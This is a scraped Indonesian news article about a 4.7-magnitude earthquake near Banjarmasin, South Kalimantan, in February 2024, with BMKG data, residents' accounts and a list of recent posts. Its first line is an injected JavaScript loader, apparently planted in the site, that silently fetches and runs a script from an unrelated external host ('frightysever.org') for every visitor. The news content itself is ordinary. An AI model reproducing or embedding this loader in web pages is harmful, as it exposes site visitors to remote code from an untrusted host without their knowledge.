(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Gempa 4.7 SR Guncang Banjarmasin dan Marabahan, Warga Rasakan Getaran


KANALKALIMANTAN.COM, BANJARMASIN – Gempa bumi berkekuatan sedang mengguncang Kota Banjarmasin Provinsi Kalimantan Selatan (Kalsel), Selasa (13/2/2024) pagi.

Dari catatan data BMKG, waktu gempa yaitu pada pukul 08.22 WIB atau 09.22 Wita.

Kekuatan gempa berada di angka 4.7 skala richter (SR) dengan kedalaman gempa 10 kilometer. Dengan lintang bujur “3.19 LS 115.12 BT.

“Pusat gempa berada di darat 19 km Timur Laut Banjarmasin,” tulis laman resmi BMKG, Selasa (13/2/2024) pagi.

Baca juga: Deretan Pengusaha Tambang Pentolan Tiga Kubu Capres-Cawapres, Ini Nama-namanya

Adapun wilayah yang terkena dampak getaran gempa antara lain Kota Banjarmasin, Marabahan (Kabupaten Barito Kuala), serta tiga daerah di Provinsi Kalimantan Tengah yaitu Pulang Pisau, Palangkaraya, dan Sampit.

Sementara itu, beberapa warga Banjarmasin mengaku sempat merasakan getaran.

Dedi Nurhidayat, mahasiswa yang tinggal di kawasan Bina Brata Kecamatan Banjarmasin Timur mengaku merasakan getaran seperti gempa pada pagi hari.

“Saya tadi lagi scroll tiktok tiba-tiba kos goyang, kerasa banget gempanya,” aku Dedi.

Suara dari getaran, kata Dedi, cukup terasa karena poisis kamarnya berada di lantai dua bangun kos yang terbuat dari kayu.

Baca juga: 20 ‘Dosa’ Pemerintah yang Diungkap Film Dirty Vote

Sementara seorang warga yang tinggal di wilayah Marabahan Kabupaten Batola juga mengaku merasakan hal yang sama.

“Berasa banar bagoyang rumah,” kata Nur Mulyana warga Kecamatan Tabukan, Batola.

Kepala Badan Meteorologi Klimatologi dan Geofisika (BMKG) Stasiun Geofisika Balikpapan, Rasmid mengatakan, gempa yang menggoyang Kalsel merupakan gempa tektonik. Hasil analisis BMKG menunjukkan gempa bumi ini memiliki parameter update dengan magnitudo 4,7.

“Episenter gempa bumi terletak pada koordinat 3,19° LS ; 115,12° BT, atau tepatnya berlokasi di darat pada jarak 19 kilometer arah timur laut Banjar, pada kedalaman 10 kilometer,” ujarnya dalam keterangan resmi.

Baca juga: TKN Prabowo Sebut Dirty Vote Fitnah, Kubu AMIN dan Ganjar Kompak Edukasi Politik

Rasmid membeberkan, jika dilihat dari lokasi episenter dan kedalaman hiposenternya. Gempa bumi yang terjadi merupakan jenis gempa bumi dangkal akibat adanya aktivitas patahan Meratus.

Berdasarkan estimasi peta guncangan, gempa bumi menimbulkan guncangan di daerah Banjarmasin, Kabupaten Tapin, Marabahan Kabupaten Barito Kuala, getaran dirasakan nyata dalam rumah. Sementara, getaran serasa truk berlalu terasa hingga Sampit, Pulang Pisau, dan Palangkaraya. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Al Ghifari

Recent Posts

Ibu Ruli Terima Kursi Roda Bantuan Polsek Banjarbaru Utara

KANALKALIMANTAN.COM, BANJARBARU - Bentuk kepedulian terhadap masyarakat, Unit Binmas Polsek Banjarbaru Utara memberikan bantuan sebuah… Read More

44 menit ago

Ini Alasan Pemko Banjarbaru Larang Peternakan Babi Ada di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas peternakan babi di Kota Banjarbaru kembali menjadi sorotan. Selain dikeluhkan atas… Read More

2 jam ago

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

3 jam ago

Peternak Babi di Pandarapan Keberatan Batas Waktu Tiga Bulan Bongkar Kandang

KANALKALIMANTAN.COM, BANJARBARU - Puluhan peternak babi di Jalan Pandarapan RT 34 RW 5, Kelurahan Guntung… Read More

4 jam ago

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

17 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

17 jam ago

This website uses cookies.